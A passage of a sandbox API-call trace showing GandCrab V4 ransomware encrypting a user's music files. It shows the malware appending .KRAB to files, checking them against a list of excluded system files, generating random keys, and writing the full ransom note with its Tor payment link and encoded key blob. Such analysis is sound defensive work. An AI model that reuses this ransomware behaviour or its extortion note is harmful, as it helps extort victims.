lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\smazj9308szr_gdtewa.wav.krab")) returned 1 [0094.418] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.418] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0094.420] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0094.420] CloseHandle (hObject=0x778) returned 1 [0094.420] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.420] lstrcmpW (lpString1="Cu5ePZX R9qPU", lpString2=".") returned 1 [0094.420] lstrcmpW (lpString1="Cu5ePZX R9qPU", lpString2="..") returned 1 [0094.420] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="Cu5ePZX R9qPU" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU" [0094.420] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\" [0094.420] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.420] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.421] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.421] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.421] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.421] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.421] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.421] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\\\KRAB-DECRYPT.txt") returned 80 [0094.422] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\cu5epzx r9qpu\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0094.422] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0094.422] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0094.423] CloseHandle (hObject=0x778) returned 1 [0094.423] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.424] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.424] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x29, wMilliseconds=0x277)) [0094.424] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.425] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.425] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.425] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\d2ca4a08d2ca4dee3d.lock") returned 86 [0094.425] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\cu5epzx r9qpu\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0094.426] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.426] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\") returned 63 [0094.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\*" [0094.427] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd7a0 [0094.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.427] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.427] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.427] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0094.427] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0094.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\d2ca4a08d2ca4dee3d.lock" [0094.427] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.428] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 91 [0094.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\d2ca4a08d2ca4dee3d.lock") returned 86 [0094.428] lstrlenW (lpString=".lock") returned 5 [0094.428] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.429] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0094.429] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.429] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.430] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.430] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0094.430] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0094.430] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\KRAB-DECRYPT.txt" [0094.430] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.430] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\KRAB-DECRYPT.txt.KRAB") returned 84 [0094.430] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\KRAB-DECRYPT.txt") returned 79 [0094.430] lstrlenW (lpString=".txt") returned 4 [0094.430] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.431] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0094.431] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.431] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\KRAB-DECRYPT.txt") returned 79 [0094.431] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Cu5ePZX R9qPU\\KRAB-DECRYPT.txt") returned 79 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0094.431] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0094.431] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.432] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0094.432] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0094.432] CloseHandle (hObject=0x778) returned 1 [0094.432] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.432] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0094.432] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0094.432] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\d2ca4a08d2ca4dee3d.lock" [0094.432] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.433] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 77 [0094.433] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\d2ca4a08d2ca4dee3d.lock") returned 72 [0094.433] lstrlenW (lpString=".lock") returned 5 [0094.433] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.433] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0094.433] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.434] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.434] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.434] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0094.434] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0094.434] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\KRAB-DECRYPT.txt" [0094.434] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.434] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\KRAB-DECRYPT.txt.KRAB") returned 70 [0094.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\KRAB-DECRYPT.txt") returned 65 [0094.435] lstrlenW (lpString=".txt") returned 4 [0094.435] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.435] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0094.435] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\KRAB-DECRYPT.txt") returned 65 [0094.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\KRAB-DECRYPT.txt") returned 65 [0094.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0094.435] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0094.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0094.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0094.436] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0094.436] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.436] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.436] lstrcmpW (lpString1="plMbICm9J-.mp3", lpString2=".") returned 1 [0094.436] lstrcmpW (lpString1="plMbICm9J-.mp3", lpString2="..") returned 1 [0094.436] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="plMbICm9J-.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3" [0094.436] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.436] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3.KRAB") returned 68 [0094.437] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3") returned 63 [0094.437] lstrlenW (lpString=".mp3") returned 4 [0094.437] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.437] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0094.437] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.437] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3") returned 63 [0094.437] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\plMbICm9J-.mp3") returned 63 [0094.437] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="desktop.ini") returned 1 [0094.437] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="autorun.inf") returned 1 [0094.437] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="ntuser.dat") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="iconcache.db") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="bootsect.bak") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="boot.ini") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="ntuser.dat.log") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="thumbs.db") returned -1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="ntldr") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="NTDETECT.COM") returned 1 [0094.438] lstrcmpiW (lpString1="plMbICm9J-.mp3", lpString2="Bootfont.bin") returned 1 [0094.438] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.438] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011458) returned 1 [0094.439] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.439] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.440] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.440] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0094.440] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0094.440] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.440] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011018) returned 1 [0094.441] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, 